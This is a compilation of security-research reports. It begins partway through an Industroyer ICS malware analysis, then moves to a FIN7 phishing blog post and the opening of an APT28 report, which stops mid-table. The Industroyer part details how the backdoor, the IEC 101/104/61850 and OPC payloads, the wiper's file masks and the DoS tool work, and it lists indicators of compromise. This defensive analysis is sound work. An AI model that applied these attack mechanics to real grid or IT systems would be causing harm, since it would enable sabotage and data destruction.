any link between those attacks and the code in this malware.
Win32/Industroyer
Main backdoor
We refer to the core component of Industroyer as the main backdoor. The
main backdoor is used by the attackers behind Industroyer to control all
other components of the malware.
As backdoors go, this component is pretty straightforward, connecting
to its remote C&C server using HTTPS and receiving commands from
the attackers. All analyzed samples are hardcoded to use the same proxy
address, located in the local network. Thus, the backdoor is clearly designed
to work only in one specific organization. It is also worth mentioning that
most of the C&C servers used by this backdoor are running Tor software.
Perhaps the most interesting feature of this backdoor is that attackers
can define a specific hour of the day when the backdoor will be active.
For example, the attackers can modify the backdoor in this way so it will
communicate with its C&C server only outside working hours. This can make
detection based only on network traffic examination harder. However, all the
samples analyzed so far are set to work 24 hours round the clock.
Once connected to its remote C&C server, the main backdoor component
sends the following data in a POST-request:
the globally unique identifier (GUID) string for the current hardware
profile retrieved via GetCurrentHwProfile
the version of the malware: 1.1e
the hardcoded ID of the sample
the result of any previously-received command
The hardcoded ID is used by the attacker as an identifier for the infected
machine. Across all analyzed samples we found the following hardcoded ID
values:
DEF
DEF-C
DEF-WS
DEF-EP
DC-2-TEMP
DC-2
CES-McA-TEMP
CES
SRV_WSUS
SRV_DC-2
SCE-WSUS01
The main backdoor component supports the following commands:
Command ID
Figure 2. The decompiled main backdoor code has a check for time-of-day.
Purpose
Execute a process
Execute a process under a specific user account.
Credentials for the account are supplied by the
attacker
Download a file from C&C server
Copy a file
Win32/Industroyer
Command ID
Purpose
Execute a shell command
Execute a shell command under a specific user
account. Credentials for the account are supplied
by the attacker
Quit
Stop a service
Stop a service under a specific user account.
Credentials for the account are supplied by
the attacker
Start a service under a specific user account.
Credentials for the account are supplied by
the attacker
Replace "Image path" registry value for a service
Once the attackers obtain administrator privileges, they can upgrade
the installed backdoor to a more privileged version that is executed as
a Windows service program. To do this they pick an existing, non-critical
Windows service and replace its ImagePath registry value with the path of
the new backdoor
s binary.
The functionality of the main backdoor that works as a Windows service
is the same as just described. However, there are two small differences:
first the backdoor
s version is 1.1s, instead of 1.1e, and second, there is code
obfuscation. The code of this version of the backdoor is mixed with junk
assembly instructions.
Figure 3. The obfuscated assembly code of the main backdoor that works as
a Windows service.
Additional backdoor
The additional backdoor provides an alternative persistence mechanism
that allows the attackers to regain access to a targeted network in case the
main backdoor is detected and/or disabled.
This backdoor is a trojanized version of the Windows Notepad application.
This is a fully functional version of the application, but the malware authors
have inserted malicious code that is executed each time the application is
launched. Once the attackers gain administrator privileges, they are able to
replace the legitimate Notepad manually.
The inserted malicious code is heavily obfuscated, but once the code is
decrypted it connects to a remote C&C server, which is different to the one
linked in the main backdoor, and downloads a payload. This is in the form
Win32/Industroyer
of shellcode that is loaded directly into memory and executed. In addition,
the inserted code decrypts the original Windows Notepad code, which
is stored at the end of the file, and then passes execution to it. Thus, the
Notepad application works as expected.
Launcher component
This component is a separate executable responsible for launching the
payloads and the Data wiper component.
The Launcher component contains a specific time and date. Analyzed
samples contained two dates, 17th December 2016 and 20th December 2016.
Once one of these dates is reached the component creates two threads.
The first thread makes attempts to load a payload DLL, while the second
thread waits one or two hours (it depends on the Launcher component
version) and then attempts to load the Data wiper component. The priority
for both threads is set to THREAD_PRIORITY_HIGHEST, which means that
these two threads receive a higher than normal share of CPU resources
from the operating system.
The name of the payload DLL is supplied by the attackers via a command
line parameter supplied in one of the main backdoor
execute a shell
command
commands. The Data wiper component is always named
haslo.
dat. The expected command lines are of the form:
Figure 4. Comparison between original Notepad binary code (at the left)
and backdoored binary code.
%LAUNCHER%.exe %WORKING_DIRECTORY% %PAYLOAD%.dll
%CONFIGURATION%.ini
Each argument on the command line represents the following:
%LAUNCHER%.exe is the filename of the Launcher component
%WORKING_DIRECTORY% is the directory where the payload DLL and
configuration is stored
%PAYLOAD%.dll is the filename of the payload DLL
%CONFIGURATION%.ini is the file that stores configuration data for the
specified payload. The path to this file is supplied to the payload DLL by
the Launcher component
The payload and Data wiper components are standard Windows DLL files.
In order to be loaded by the Launcher component they must export a
function named Crash as seen in Figure 5.
Win32/Industroyer
Windows device names (usually COM ports), the number of Information
Object Address (IOA) ranges, and the beginning and ending IOA values
for the specified number of IOA ranges. IOA is a number that identifies
a particular data element in the device. Figure 6 illustrates a 101 payload
configuration file with two defined IOA ranges, 10-15 and 20-25.
Figure 5. Example payload DLL that has internal name Crash101.dll
and Crash export function.
101 payload component
This payload DLL has the filename 101.dll and is named after IEC 101 (aka
IEC 60870-5-101), an international standard that describes a protocol for
monitoring and controlling electric power systems. The protocol is used for
communication between industrial control systems and Remote Terminal
Units (RTUs). The actual communication is transmitted through a serial
connection.
The 101 payload component partly implements the protocol described in
the IEC 101 standard and is able to communicate with an RTU or any other
device with support for that protocol.
Once executed, the 101 payload component parses the configuration stored
in its INI file. The configuration may contain several entries: process name,
Figure 6. An example of a 101 payload DLL configuration.
The name of the process specified in the configuration belongs to an
application the attackers suspect is running on the victim machine. It
should be the application the victim machine uses to communicate
through serial connection with the RTU. The 101 payload attempts to
terminate the specified process and starts to communicate with the
specified device, using the CreateFile, WriteFile and ReadFile
Windows API functions. The first COM port from the configuration file is
used for the actual communication and the two other COM ports are just
opened to prevent other processes accessing them. Thus, the 101 payload
component is able to take over and maintain control of the RTU device.
This component iterates through all IOAs in the defined IOA ranges.
For each such IOA it constructs two
select and execute
packets, one
with a single command (C_SC_NA_1) and one with a double command
(C_DC_NA_1) and sends these to the RTU device. The main goal of the
component is to change the On/Off state of single command type IOA
Win32/Industroyer
and double command type IOA. Specifically, the 101 payload has three
stages: in the first stage this component attempts to switch IOAs to their
Off state, in the second stage it attempts to invert IOA states to On, and
in the final stage the component switches IOA states to Off again.
104 payload component
This payload DLL has the filename 104.dll and is named after IEC 104 (aka
IEC 60870-5-104), an international standard. The IEC 104 protocol extends
IEC 101, so the protocol can be transmitted over a TCP/IP network.
Due to its highly configurable nature, this payload can be customized
by the attackers for different infrastructures. Figure 8 shows what a
configuration file may look like.
Figure 8. An example of 104 payload DLL configuration.
Once executed, the 104 payload DLL attempts to read its configuration file.
As described above, the path for the configuration file is supplied by the
Launcher component.
The configuration contains a STATION section followed by properties
that configure how the 104 payload should work. The configuration may
contain multiple STATION entries.
Figure 7. An example of a 101 payload packet, after being dissected in Kaitai Struct WebIDE.
Win32/Industroyer
Our analysis of this component reveals the following possible
configuration properties:
Property
Expected value
Purpose
operation
range or
sequence or shift
Specifies iteration type for
Information Object Addresses
(IOA)
Property
Expected value
Purpose
target_ip
IP address
The IP address that will be used
for the communication using IEC
104 protocol standard
range
Specific format of Specifies range of Information
IOAs
Object Addresses (IOA)
target_port
Port number
Self-explanatory
sequence
uselog
1 or 0
Enables or disables logging
to a file
Specific format of Specifies sequence of Information
IOAs
Object Addresses (IOA)
shift
logfile
Filename
Specifies the filename for the log,
if enabled
Specific formatof
IOAs
stop_comm_
service
1 or 0
Enables or disables termination of
the process
stop_comm_
service_name
Process name
Specifies the process name that
will be terminated
timeout
Timeout in
milliseconds
Specifies timeout between send
and recv calls. Default value:
15000
socket_timeout
Timeout in
milliseconds
Specify the receiving timeout.
Default value: 15000
silence
1 or 0
Enables or disables console output
asdu
Integer
Specifies ASDU (Application
Service Data Unit) address also
known as sector
first_action
on or off
Specifies the Switch value in ASDU
packet for first iteration
change
1 or 0
Specifies that the Switch value in
ASDU packet should be inverted
during iterations
command_type
def or short
or long or persist
Specifies command pulse duration
for qualifier of command (QOC)
Specifies shift of Information
Object Addresses (IOA)
Once the configuration file is read, the 104 payload creates a thread for
each STATION section defined in the configuration file. In each such
thread, the 104 payload will attempt to communicate with the specified
IP address using the protocol described in the IEC 104 standard. Before the
connection is made, the 104 payload attempts to terminate the legitimate
process that is normally responsible for IEC 104 communication with the
device. It does so only if the stop_comm_service property is specified
in its configuration. By default, the 104 payload terminates the process
named D2MultiCommService.exe, or the process name specified in its
configuration.
The main idea behind the 104 payload is relatively simple. It connects to
the specified IP address and starts to send packets with the ASDU address
that was defined in its configuration. The goal of this communication is to
interact with an IOA of a single command type.
In the configuration file, the attacker can define the operation property to
specify exactly how single command type IOAs will be iterated.
The first such operation mode is the range mode. The attackers use
this mode in order to discover possible IOAs in the targeted device. The
attackers have to take this approach because the protocol described in
the IEC 104 standard does not provide a specific method to obtain such
information.
Win32/Industroyer
The range mode has two stages. During the first stage, once the range of
IOAs is obtained from the configuration file, the 104 payload connects to
the target IP address and starts to iterate through the specified IOAs. To
each such IOA the 104 payload sends
select and execute
packets in order
to switch the state and to confirm whether the IOA belongs to the single
command type.
enabled, so between loop iterations the payload flipped the switch value
from On to Off and wrote it to the log.
Figure 9. An example of a 104 payload packet, after being dissected by Wireshark.
Once all possible IOAs from the specified range are iterated, the 104
payload switches to the second stage of range mode. If logging is enabled,
the payload writes Starting only success to the log. The rest of this
second stage is an infinite loop that uses the previously discovered IOAs of
single command type. In the loop the payload constantly sends
select and
execute
packets. In addition, if the option change is defined, the payload
flips the On/Off state between loop steps.
Figure 10 demonstrates the log file that was produced by the 104 payload
during our analysis. It shows the payload iterated IOAs from 10 to 15, and
once IOAs of the single command type were discovered, the payload
started to use them in the loop. The configuration had the change option
Figure 10. Example log file produced by the 104 payload
The second operation mode is the shift mode. This is very similar to
the range mode. The attacker defines, in the configuration file, a range of
IOAs and shift values. Once the 104 payload is activated it does everything
the same way as in range mode; however, once all IOAs in the defined
range are iterated, it starts to iterate over the new range. The new range is
calculated by adding the shift values to the default range values.
The third operation mode is the sequence mode. It can be used by
attackers once they know the values of all IOAs of the single command
type that are supported by the connected device. This payload immediately
Win32/Industroyer
executes an infinite loop, sending
select and execute
packets to the IOAs
defined in the configuration file.
Aside from its logging capability, the 104 payload can output debug
information to the console, as seen in Figure 11.
61850 payload component
Unlike the 101 and 104 payloads, this payload component exists as a
standalone malicious tool comprising an executable named 61850.exe
and the DLL 61850.dll. It is named after the IEC 61850 standard. This
standard describes a protocol used for multivendor communication among
devices that perform protection, automation, metering, monitoring, and
control of electrical substation automation systems. The protocol is very
complex and robust, but the 61850 payload uses only a small subset of the
protocol to produce its disruptive effect.
Once executed, the 61850 payload DLL attempts to read the configuration
file, the path to which is supplied by the Launcher component. The
standalone version defaults to reading its configuration from i.ini. The
configuration file is expected to contain a list of IP addresses of devices
capable of communicating via the protocol described in the IEC 61850
standard.
Figure 11. The console output of the 104 payload.
If the configuration file is not present, then this component enumerates all
connected network adaptors to determine their TCP/IP subnet masks. The
61850 payload then enumerates all possible IP addresses for each of these
subnet masks, and tries to connect to port 102 on each of those addresses.
Therefore, this component has the ability to discover relevant devices in the
network automatically.
Otherwise, if a configuration file is present and it contains target IP
addresses, this component connects to port 102 on those IP addresses and
on IP addresses that were discovered automatically.
Once this component connects to a target host, it sends a Connection
Request packet using the Connection Oriented Transport Protocol, as seen
in Figure 12.
Win32/Industroyer
Figure 12. A Connection Request packet, after dissection by Wireshark.
Figure 13. The dissected MMS getNameList request in Wireshark.
If the target device responds appropriately, the 61850 payload then sends
an InitiateRequest packet using the Manufacturing Message Specification
(MMS). If the expected answer is received, it continues, sending an MMS
getNameList request. Thereby, the component compiles a list of object
names in a Virtual Manufacturing Device (VMD).
Afterwards, the 61850 payload parses data received in response to these
requests, searching for variables that contain following combinations of
strings:
Next, this component enumerates the objects discovered in the previous
step and sends the device domain-specific getNameList requests with
each object name. This enumerates named variables in a specific domain.
CSW, CO, Pos, Oper, but not $T
CSW, CF, Pos, and Model
CSW, ST, Pos, and stVal
CSW, CO, Pos, SBO, but not $T
The string CSW is a name for logical nodes, which are used to control
circuit breakers and switches.
For variables that contain the Model or stVal string the 61850 payload sends
an additional MMS Read request. For some of the variables this component
may also issue an MMS Write request that will change its state.
Win32/Industroyer
The 61850 payload produces a log file of its operations that contains the IP
addresses, MMS domains, named variables and the node states (open or
closed) of its targets.
OPC DA payload component
The OPC DA payload component implements a client for the protocol
described in the OPC Data Access specification. OPC (OLE for Process
Control) is a software standard and specification that is based on Microsoft
technologies such as OLE, COM, and DCOM. The Data Access (DA) part of
the OPC specification allows real-time data exchange between distributed
components, based on a client
server model.
This component exists as a standalone malicious tool with the filename
OPC.exe and a DLL, which implement both 61850 and OPC DA
payload functionalities. This DLL is named, internally in PE export table,
OPCClientDemo.dll, suggesting that the code of this component may be
based on the open source project OPC Client.
Next the component uses the IOPCBrowseServerAddressSpace
interface to enumerate all OPC items on the server. Specifically, it looks for
items that contain the following strings in their name:
ctlSelOn
ctlOperOn
ctlSelOff
ctlOperOff
\Pos and stVal
The names of these items may suggest that attackers are interested in
OPC items provided by OPC servers that belong to solutions from ABB,
such as their MicroSCADA range. Figure 15 demonstrates an example list of
OPC items that contain names with similar strings. This list of OPC items is
received by the OPC Process Objects List Tool from ABB.
Figure 14. The PE export reveals the internal DLL name of the OPC DA payload.
The OPC DA payload does not require any kind of configuration file.
Once executed by the attacker, it enumerates all OPC servers using the
ICatInformation::EnumClassesOfCategories method with CATID_
OPCDAServer20 category identifier and IOPCServer::GetStatus to
identify the ones running.
Figure 15. An example of OPC items names in IN field received using
OPC Process Objects List Tool.
Win32/Industroyer
The attackers use the string Abdul when they add a new OPC group.
Possibly this string is used by the attackers as a slang term when referring
to the ABB solutions.
The component writes the OPC server name, OPC item name state, quality
code and value to the log file. The logged values are separated with the
following headers:
[*ServerName: %SERVERNAME%] [State: Before]
[*ServerName: %SERVERNAME%] [State: After ON]
[*ServerName: %SERVERNAME%] [State: After OFF]
Data wiper component
The data wiper component is a destructive module that is used in the final
stage of an attack. The attackers are using this component to hide their
tracks and to make recovery difficult.
Figure 16. The disassembled code of the OPC DA component that uses the Abdul string.
On the final step, the OPC DA payload attempts to change the state of
discovered OPC items using the IOPCSyncIO interface by writing the 0x01
value twice.
This component has the filename haslo.dat or haslo.exe and can
be executed by the Launcher component or used as a standalone
malicious tool.
Once executed it attempts to enumerate all keys in the registry that list
Windows services:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
It attempts to set the registry value ImagePath with an empty string in
each of the entries found. This operation will make the operating system
unbootable.
The next step is actual deletion of file contents. The component
enumerates files with specific file extensions on all drives connected to
computer, from C:\ to Z:\. It should be noted that during enumeration
the component skips files that are located in subdirectory that contains
Windows in its name.
Figure 17. Disassembled code of OPC DA payload that uses IOPCSyncIO interface.
The component rewrites file content with meaningless data obtained from
newly allocated memory. In order to perform this operation thoroughly the
component attempts to rewrite files twice. The first attempt happens once
the file is found on a drive. If the first attempt is unsuccessful then the wiper
malware makes a second attempt, but before that the malware terminates
Win32/Industroyer
all processes except those included in a list of critical system processes. The
list of these processes is displayed in Figure 18.
To speed up the wiping operation this component rewrites only partial file
content at the beginning of the file. The amount of data to be rewritten
depends on file size: the smallest amount of data will be rewritten for files
less than or equal to 1Mb (4096 bytes); the largest amount of data will be
rewritten for files less than or equal to 10Mb (32768 bytes).
Finally, this component attempts to terminate all processes (including
system processes) except its own. This will result in the system becoming
unresponsive and eventually crashing.
*.SCL
*.cxm
*.7z
*.bak
*.elb
*.exe
*.dll
*.cid
*.epl
*.scd
*.mdf
*.pcmp
*.ldf
This list contains filename extensions that are used in a standard
environment, such as Windows binaries (.exe/.dll), archives (.7z /.tar/.rar/.
zip), backup files (.bak/.bk/.bkp), Microsoft SQL server files (.mdf/.ldf),
and various configuration files (.ini/.xml). In addition, the component also
wipes files that may be used in industrial control systems, such as files
written using Substation Configuration description Language (.scl/.cid/.scd) and
there are many files and file extensions that are used by various products
from ABB. For example, a file named SYS_BASCON.COM is used by ABB
solutions for storing configuration data, and files with the .paf (Product
Authorization File) filename extension are used to store license data
for ABB MicroSCADA products.
Additional tools: port scanner tool
Figure 18. List of processes that are not terminated on second rewriting attempt.
The filename masks targeted by the data wiper component to be
overwritten are:
SYS_BASCON.COM
*.pcmi
*.bk
*.pcmt
*.bkp
*.PL
*.ini
*.log
*.paf
*.xml
*.zip
*.XRF
*.CIN
*.rar
*.trc
*.prj
*.tar
The attackers
arsenal includes a port scanner that can be used to map
the network and to find computers relevant to their attack. Interestingly,
instead of using software already existing, the attackers built their own
custom-made port scanner. As is evident from Figure 19, the attacker can
define a range of IP addresses and a range of network ports that are to be
scanned by this tool.
Figure 19. The port scanner tool usage example.
Win32/Industroyer
Additional tools: DoS tool
Another tool from the attackers
arsenal is a Denial-of-Service (DoS) tool
that can be used against Siemens SIPROTEC devices. This tool leverages
the CVE-2015-5374 vulnerability in order to render a device unresponsive.
Once this vulnerability is successfully exploited, the target device stops
responding to any commands until it is rebooted manually.
To exploit this vulnerability the attackers hardcoded the device IP addresses
into this tool. Once the tool is executed it sends specifically crafted packets
to port 50,000 of the target IP addresses using UDP. The UDP packet
contains only 18 bytes.
Figure 20. Content of UDP packet used during exploitation of CVE-2015-5374.
Conclusion
The commonly-used industrial control protocols used in this malware
were designed decades ago without taking security into consideration.
Therefore, any intrusion into an industrial network with systems using
these protocols should be considered as
game over
Indicators of Compromise (IoC)
SHA-1 hashes:
F6C21F8189CED6AE150F9EF2E82A3A57843B587D
CCCCE62996D578B984984426A024D9B250237533
8E39ECA1E48240C01EE570631AE8F0C9A9637187
2CB8230281B86FA944D3043AE906016C8B5984D9
79CA89711CDAEDB16B0CCCCFDCFBD6AA7E57120A
94488F214B165512D2FC0438A581F5C9E3BD4D4C
5A5FAFBC3FEC8D36FD57B075EBF34119BA3BFF04
B92149F046F00BB69DE329B8457D32C24726EE00
B335163E6EB854DF5E08E85026B2C3518891EDA8
The investigation behind the Ukrainian power outage last December is still
ongoing and it is currently not confirmed that the malware analyzed here
was the direct cause. Nevertheless, we believe that to be a very probable
explanation, as the malware is able to directly control switches and circuit
breakers at power grid substations using four ICS protocols and contains an
activation timestamp for December 17, 2016, the day of the power outage.
IP addresses of C&C servers:
We can definitely say that the Win32/Industroyer malware family is an
advanced and sophisticated piece of malware that is used against industrial
control systems. However, it should be noted that the malware itself is just
a tool in the hands of an even more advanced and very capable malicious
actor. Using logs produced by the toolset and highly configurable payloads,
the attackers could adapt the malware to any comparable environment.
Warning! Most of the servers with these IP addresses were part of Tor
network which means that the use of these indicators could result in a
false positive match.
195.16.88[.]6
46.28.200[.]132
188.42.253[.]43
5.39.218[.]152
93.115.27[.]57
FIN7 Spear Phishing Campaign Targets Personnel Involved
in SEC Filings
fireeye.com /blog/threat-research/2017/03/fin7_spear_phishing.html
In late February 2017, FireEye as a Service (FaaS) identified a spear phishing campaign that appeared to be
targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various
organizations. Based on multiple identified overlaps in infrastructure and the use of similar tools, tactics, and
procedures (TTPs), we have high confidence that this campaign is associated with the financially motivated threat
group tracked by FireEye as FIN7.
FIN7 is a financially motivated intrusion set that selectively targets victims and uses spear phishing to distribute its
malware. We have observed FIN7 attempt to compromise diverse organizations for malicious operations
usually
involving the deployment of point-of-sale malware
primarily against the retail and hospitality industries.
Spear Phishing Campaign
All of the observed intended recipients of the spear phishing campaign appeared to be involved with SEC filings for
their respective organizations. Many of the recipients were even listed in their company
s SEC filings. The sender
email address was spoofed as EDGAR and the attachment was named
Important_Changes_to_Form10_K.doc
(MD5: d04b6410dddee19adec75f597c52e386). An example email is
shown in Figure 1.
Figure 1: Example of a phishing email sent during this campaign
We have observed the following TTPs with this campaign:
The malicious documents drop a VBS script that installs a PowerShell backdoor, which uses DNS TXT
records for its command and control. This backdoor appears to be a new malware family that FireEye iSIGHT
Intelligence has dubbed POWERSOURCE. POWERSOURCE is a heavily obfuscated and modified version
of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and
control and is installed in the registry or Alternate Data Streams. Using DNS TXT records to communicate is
not an entirely new finding, but it should be noted that this has been a rising trend since 2013 likely because it
makes detection and hunting for command and control traffic difficult.
We also observed POWERSOURCE being used to download a second-stage PowerShell backdoor called
TEXTMATE in an effort to further infect the victim machine. The TEXTMATE backdoor provides a reverse
shell to attackers and uses DNS TXT queries to tunnel interactive commands and other data. TEXTMATE is
memory resident
often described as
fileless
malware. This is not a novel technique by any means, but
s worth noting since it presents detection challenges and further speaks to the threat actor
s ability to
remain stealthy and nimble in operations.
In some cases, we identified a Cobalt Strike Beacon payload being delivered via POWERSOURCE. This
particular Cobalt Strike stager payload was previously used in operations linked to FIN7.
We observed that the same domain hosting the Cobalt Strike Beacon payload was also hosting a
CARBANAK backdoor sample compiled in February 2017. CARBANAK malware has been used heavily by
FIN7 in previous operations.
Victims
Thus far, we have directly identified 11 targeted organizations in the following sectors:
Financial services, with different victims having insurance, investment, card services, and loan focuses
Transportation
Retail
Education
IT services
Electronics
All these organizations are based in the United States, and many have international presences. As the SEC is a
U.S. regulatory organization, we would expect recipients of these spear phishing attempts to either work for U.S.based organizations or be U.S.-based representatives of organizations located elsewhere. However, it is possible
that the attackers could perform similar activity mimicking other regulatory organizations in other countries.
Implications
We have not yet identified FIN7
s ultimate goal in this campaign, as we have either blocked the delivery of the
malicious emails or our FaaS team detected and contained the attack early enough in the lifecycle before we
observed any data targeting or theft. However, we surmise FIN7 can profit from compromised organizations in
several ways. If the attackers are attempting to compromise persons involved in SEC filings due to their information
access, they may ultimately be pursuing securities fraud or other investment abuse. Alternatively, if they are tailoring
their social engineering to these individuals, but have other goals once they have established a foothold, they may
intend to pursue one of many other fraud types.
Previous FIN7 operations deployed multiple point-of-sale malware families for the purpose of collecting and
exfiltrating sensitive financial data. The use of the CARBANAK malware in FIN7 operations also provides limited
evidence that these campaigns are linked to previously observed CARBANAK operations leading to fraudulent
banking transactions, ATM compromise, and other monetization schemes.
Community Protection Event
FireEye implemented a Community Protection Event
FaaS, Mandiant, Intelligence, and Products
to secure all
clients affected by this campaign. In this instance, an incident detected by FaaS led to the deployment of additional
detections by the FireEye Labs team after FireEye Labs Advanced Reverse Engineering quickly analyzed the
malware. Detections were then quickly deployed to the suite of FireEye products.
The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of a
variety of topics discussed in this post, including FIN7 and the POWERSOURCE and TEXTMATE malware.
Click here for more information.
FIREEYE iSIGHT INTELLIGENCE
APT28:
AT THE CENTER
OF THE STORM
RUSSIA STRATEGICALLY EVOLVES
ITS CYBER OPERATIONS
S P ECIAL R E P O RT / JAN UARY 2017
CONTENTS
Introduction
Overview
APT28 Targeting And Intrusion Activity
Table 1 - APT28 Targeting of Political Entities and Intrusion Activity
Table 2 - APT28 Network Activity Has Likely Supported
Information Operations
From Olympic Slight to Data Leak:
Investigating APT28 at the World Anti-Doping Agency
Conclusion
Appendix
SPECIAL REPORT / APT28: AT THE CENTER OF THE STORM
INTRODUCTION
The Democratic National Committee
s (DNC) June
2016 announcement attributing its network breach
to the Russian Government triggered an international
debate over Russia
s sponsorship of information
operations against the U.S.
At issue is the question of proof: did the Russian Government direct the group
responsible for the breaches and related data leaks? If so, is this simply a matter
of accepted state espionage, or did it cross a line? Was the DNC breach part
of a concerted effort by the Russian Government to interfere with the U.S.
presidential election?
Unfortunately, we have failed to ask the most consequential question: how will
Russia continue to employ a variety of methods, including hacks and leaks,
to undermine the institutions, policies, and actors that the Russian Government
perceives as constricting and condemning its forceful pursuit of its state aims?
Our visibility into the operations of APT28 - a group we believe the Russian
Government sponsors - has given us insight into some of the government
targets, as well as its objectives and the activities designed to further them.
We have tracked and profiled this group through multiple investigations, endpoint
and network detections, and continuous monitoring. Our visibility into APT28
operations, which date to at least 2007, has allowed us to understand the group
malware, operational changes, and motivations. This intelligence has been critical
to protecting and informing our clients, exposing this threat, and strengthening
our confidence in attributing APT28 to the Russian Government.
SPECIAL REPORT / APT28: AT THE CENTER OF THE STORM
OVERVIEW
On December 29, 2016, the Department of Homeland Security (DHS)
and Federal Bureau of Investigation (FBI) released a Joint Analysis
Report confirming FireEye
s long held public assessment that the Russian
Government sponsors APT28. Since at least 2007, APT28 has engaged
in extensive operations in support of Russian strategic interests.
The group, almost certainly compromised of a sophisticated and prolific
set of developers and operators, has historically collected intelligence on
defense and geopolitical issues. APT28 espionage activity has primarily
targeted entities in the U.S., Europe, and the countries of the former
Soviet Union, including governments and militaries, defense attaches,
media entities, and dissidents and figures opposed to the current Russian
Government.
Over the past two years, Russia appears to have increasingly leveraged
APT28 to conduct information operations commensurate with broader
strategic military doctrine. After compromising a victim organization,
APT28 will steal internal data that is then leaked to further political
narratives aligned with Russian interests. To date these have included
the conflict in Syria, NATO-Ukraine relations, the European Union refugee
and migrant crisis, the 2016 Olympics and Paralympics Russian athlete
doping scandal, public accusations regarding Russian state-sponsored
hacking, and the 2016 U.S. presidential election.
This report details our observations of APT28
targeting, and our investigation into a related
breach. We also provide an update on shifts in the
group
s tool development and use, and summarize
the tactics APT28 employs to compromise its victims.
SPECIAL REPORT / APT28: AT THE CENTER OF THE STORM
APT28 TARGETING AND
INTRUSION ACTIVITY
In October 2014, FireEye released APT28: A Window into
Russia
s Cyber Espionage Operations?, and characterized
APT28
s activity as aligning with the Russian Government
strategic intelligence requirements. While tracking APT28,
we noted the group
s interest in foreign governments and
militaries, particularly those of European and Eastern
European nations, as well as regional security organizations,
such as the North Atlantic Treaty Organization (NATO)
and the Organization for Security and Cooperation
in Europe (OSCE), among others. Table 1 highlights
some recent examples of this activity.
SPECIAL REPORT / APT28: AT THE CENTER OF THE STORM
TA B L E 1 : A P T 2 8 TA R G E T I N G O F P O L I T I C A L E N T I T I E S A N D I N T R U S I O N AC T I V I T Y
ENTIT Y
OSCE
Germany's Christian
Democratic Union (CDU)
Pussy Riot
NATO, Afghan Ministry
of Foreign Affairs, Pakistani
Military
TIMEFRAME
A P T 2 8 TA R G E T I N G A N D I N T R U S I O N AC T I V I T Y
NOVEMBER 2016
The OSCE confirmed that it had suffered an intrusion,
which a Western intelligence service attributed to APT28.1
APRIL - MAY 2016
Researchers at Trend Micro observed APT28 establish a fake
CDU email server and launch phishing emails against CDU
members in an attempt to obtain their email credentials and access
their accounts. 2,3
AUGUST 2015
APT28 targets Russian rockers and dissidents Pussy Riot via
spear-phishing emails.4
JULY 2015
APT28 used two domains (nato-news.com and bbc-news.org) to host
an Adobe Flash zero-day exploit to target NATO, the Afghan Ministry
of Foreign Affairs, and the Pakistani military.
German Bundestag
& Political Parties
JUNE 2015
Germany
s Federal Office for Security in Information Technology (BSI)
announced that APT28 was likely responsible for the spear phishing
emails sent to members of several German political parties. The head
of Germany
s domestic intelligence agency, Bundesamt f
r Verfassungsschutz (BfV), also attributed the June 2015 compromise of
the Bundestag
s networks to APT28. 5,6
Kyrgyzstan Ministry
of Foreign Affairs
OCTOBER 2014
THROUGH
SEPTEMBER 2015
FireEye iSight Intelligence identified changes made to domain name
server (DNS) records that suggest that APT28 intercepted email traffic from the Kyrgyzstan Ministry of Foreign Affairs after maliciously
modifying DNS records of the ministry
s authoritative DNS servers.
Polish Government & Power
Exchange websites
JUNE AND
SEPTEMBER 2014
APT28 employed
Sedkit
in conjunction with strategic web compromises to deliver
Sofacy
malware on Polish Government websites,
and the websites of Polish energy company Power Exchange.7
Gauquelin, Blaise.
La Russie soup
tre responsable d
un piratage informatique contre l
OSCE.
Le Monde. 28 Dec. 2016. Web. 29 Dec. 2016.
Trend Micro refers to activity corresponding to FireEye
s APT28 as
Pawn Storm.
Hacquebord Feike.
Pawn Storm Targets German Christian Democratic Union.
Trend Micro. 11 May 2016. Web. 29 Dec. 2016.
Hacquebord Feike.
Pawn Storm
s Domestic Spying Campaign Revealed; Ukraine and US Top Global Targets.
TrendLabs Security Intelligence Blog, Trend Micro. 18 August 2015. Web. 29 Dec. 2016.
Neuer Hackerangriff auf Bundespolitiker / BSI warnt Parteien vor Cyberangriffen.
Westdeutscher Rundfunk. 20 Sept. 2016. Web. 29 Dec. 2016.
Russia
was Behind German Parliament Hack.
The BBC. 13 May 2016. Web. 29 Dec. 2016.
Kharouni, Loucif. et al.
Operation Pawn Storm: Using Decoys to Evade Detection.
Trend Micro. 22 Oct. 2014. Web. 3 Jan. 2017.
SPECIAL REPORT / APT28: AT THE CENTER OF THE STORM
Since 2014, APT28 network activity has likely supported
information operations designed to influence the domestic
politics of foreign nations. Some of these operations have
involved the disruption and defacement of websites, false flag
operations using false hacktivist personas, and the theft of
data that was later leaked publicly online.
Table 2 highlights incidents in which victims suffered
a compromise that FireEye iSIGHT Intelligence, other
authorities, or the victims themselves later attributed to the
group we track as APT28. All of these operations have aimed
to achieve a similar objective: securing a political outcome
beneficial to Russia.
TA B L E 2 : A P T 2 8 N E T WO R K AC T I V I T Y H A S L I K E LY S U P P O R T E D I N F O R M AT I O N O P E R AT I O N S
VICTIM
TIMEFRAME
A P T 2 8 N E T WO R K AC T I V I T Y
A S S O C I AT E D I N F O R M AT I O N O P E R AT I O N S
AC T I V I T Y
SEPTEMBER 2016
On September 13, WADA confirmed that APT28
had compromised its networks and accessed
athlete medical data. 8
On September 12, 2016, the
Fancy Bears
Hack Team
persona
claimed to have compromised WADA and released athletes
medical records as
proof of American athletes taking doping.
APRIL
SEPTEMBER 2016
The DNC announced it had suffered a network
compromise and that a subsequent investigation
found evidence of two breaches, attributed to
APT28 and APT29. FireEye analyzed the malware found on DNC networks and determined
that it was consistent with our previous observations of APT28 tools.10,11
In June 2016, shortly after the DNC
s announcement, the Guccifer 2.0 persona claimed responsibility for the DNC breach
and leaked documents taken from the organization
s network.
Guccifer 2.0 continued to leak batches of DNC documents
through September.12,13
MARCH
NOVEMBER 2016
Investigators found that John Podesta, Hillary
Clinton
s presidential campaign chairman, was
one of thousands of individuals targeted in a
mass phishing scheme using shortened URLs
that security researchers attributed to APT28.14
Throughout October and into early November, WikiLeaks published 34 batches of email correspondence stolen from John
Podesta
s personal email account. Correspondence of other
individuals targeted in the same phishing campaign, including
former Secretary of State Colin Powell and Clinton campaign
staffer William Rinehart, were published on the
DC Leaks
website.15
U.S. Democratic
Congressional Campaign
Committee (DCCC)
MARCH OCTOBER 2016
